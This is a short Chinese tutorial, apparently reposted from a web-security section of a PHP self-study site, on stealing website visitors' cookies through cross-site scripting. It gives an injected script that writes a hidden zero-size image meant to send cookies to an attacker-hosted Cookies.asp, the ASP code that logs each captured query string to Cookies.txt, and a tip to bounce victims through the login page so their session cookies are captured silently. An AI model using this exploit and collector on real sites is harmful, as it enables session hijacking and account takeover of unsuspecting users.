利用XSS转存cookie: 插入XSS语句<script>document.write('<img src="" width=0 height=0 border=0 />');</script> 其中Cookies.asp为文件,website为网址.我们需要将asp文件放入一个可访问的网站中.当用户访问我们插入XSS页面时会执行asp程序并不弹出提示框,是隐藏进行的. - Cookies.asp的程序代码: <% msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath("Cookies.txt") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.Writeline(""&msg& "") thisfile.close set fs = nothing %> 备注:会在记录msg=并保存在程序目录下的Cookies.txt中. - 进一步扩展: www.2cto.com
当然用户可能不会登录后再访问我们的XSS页面,为使其登录后再访问,我们可在Cookies. asp 的最后加上一个自动跳转页面至登录页面,对方会下意识的登录后再次打开我们含有XSS语句的页面.这时我们就获得了访问者的cookie(ASP的自动跳转代码很多,在这里就不一一举例,各位谷歌一下会有更多更好更详细的代码)
查看更多关于利用XSS转存Cookie - 网站安全 - 自学php的详细内容...